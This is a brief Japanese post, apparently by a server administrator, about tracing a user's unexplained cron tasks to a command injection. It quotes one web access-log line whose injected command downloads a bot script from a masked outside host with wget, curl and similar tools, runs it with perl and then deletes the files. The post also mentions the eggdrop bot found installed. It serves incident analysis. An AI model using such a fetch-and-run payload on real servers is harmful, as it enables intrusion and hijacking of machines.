■
「 cron に心当たりの無いタスクが><」という問い合わせをユーザから受けたので調べてみた。ピンと来てウェブサーバのアクセスログ調べたら、3秒で原因判明。
/***/***/index.php?_REQUEST=http://******.co.kr/tool25.txt?&cmd=cd%20/tmp;rm%20bot.txt;wget%20http://***.***.***.***/bot.txt;fetch%20http://***.***.***.***/bot.txt;lwp-download%20http://***.***.***.***/bot.txt;curl%20-O%20http://***.***.***.***/bot.txt;lynx%20http://***.***.***.***/bot.txt;perl%20bot.txt;rm%20-rf%20*.txt HTTP/1.1" 200 5611 "-" "Mozilla/3.0 (compatible; Indy Library)"
コマンドインジェクション食らってますよ、お客さん!
eggdrop とか色々仕込まれてた。変なプロセスもいくつか。あーあ。